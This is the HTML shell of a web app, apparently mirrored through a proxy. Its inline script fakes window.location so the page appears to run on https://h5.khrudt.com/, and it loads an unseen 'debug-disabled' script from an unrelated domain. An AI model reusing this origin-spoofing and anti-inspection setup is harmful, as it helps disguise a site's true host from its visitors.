<!doctype html><html lang="en"><head><script>;(() => {
    window.locationProxy = ((uri) => {

        let url = null;
        let localHref = null;

        const getLocationProxy = () => {

            if (localHref === window.location.href)
                return url;

            url = new URL(uri); 
            localHref = window.location.href;

            url.hash = window.location.hash;
            url.pathname = window.location.pathname;
            url.port = window.location.port;
            url.protocol = window.location.protocol;
            url.search = window.location.search;

            return url;
        }
        
        const UrlProxy = {

            assign: target => window.location.assign(target.replace('//' + getLocationProxy().hostname + '/', '//' + window.location.hostname + '/')),

            reload: window.location.reload.bind(window.location),

            replace: target => window.location.replace(target.replace('//' + getLocationProxy().hostname + '/', '//' + window.location.hostname + '/')), 

            toString: () => getLocationProxy().toString(),

        };

        const assignProxy = (targetName, targetValue) => {

            let location = getLocationProxy();
            location[targetName] = targetValue;
            UrlProxy.assign(location.toString());

        }

        Object.defineProperty(UrlProxy, 'href', {get:()=>getLocationProxy().href, set:(target)=>assignProxy('href', target)});
        Object.defineProperty(UrlProxy, 'hash', {get:()=>getLocationProxy().hash, set:(target)=>assignProxy('hash', target)});

        Object.defineProperty(UrlProxy, 'host', {get:()=>getLocationProxy().host, set:(target)=>assignProxy('host', target)});
        Object.defineProperty(UrlProxy, 'hostname', {get:()=>getLocationProxy().hostname, set:(target)=>assignProxy('hostname', target)});
        Object.defineProperty(UrlProxy, 'origin', {get:()=>getLocationProxy().origin, set:(target)=>assignProxy('origin', target)});

        Object.defineProperty(UrlProxy, 'pathname', {get:()=>getLocationProxy().pathname, set:(target)=>assignProxy('pathname', target)});
        Object.defineProperty(UrlProxy, 'port', {get:()=>getLocationProxy().port, set:(target)=>assignProxy('port', target)});
        Object.defineProperty(UrlProxy, 'protocol', {get:()=>getLocationProxy().protocol, set:(target)=>assignProxy('protocol', target)});
        Object.defineProperty(UrlProxy, 'search', {get:()=>getLocationProxy().search, set:(target)=>assignProxy('search', target)});
        
        return UrlProxy;
        
    })('https://h5.khrudt.com/');
})();</script><script src="//xyhdgbf.store/debug-disabled.mjs?type=proxy"></script><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><link rel="icon" href="./assets/favicon.8e7727a0.ico" type="image/png"><script type="module" crossorigin src="./assets/main.e689fcef.js"></script><link rel="modulepreload" crossorigin href="./assets/user.dad7d933.js"><link rel="stylesheet" href="./assets/index.76cf754b.css"></head><body><div id="root"></div></body></html>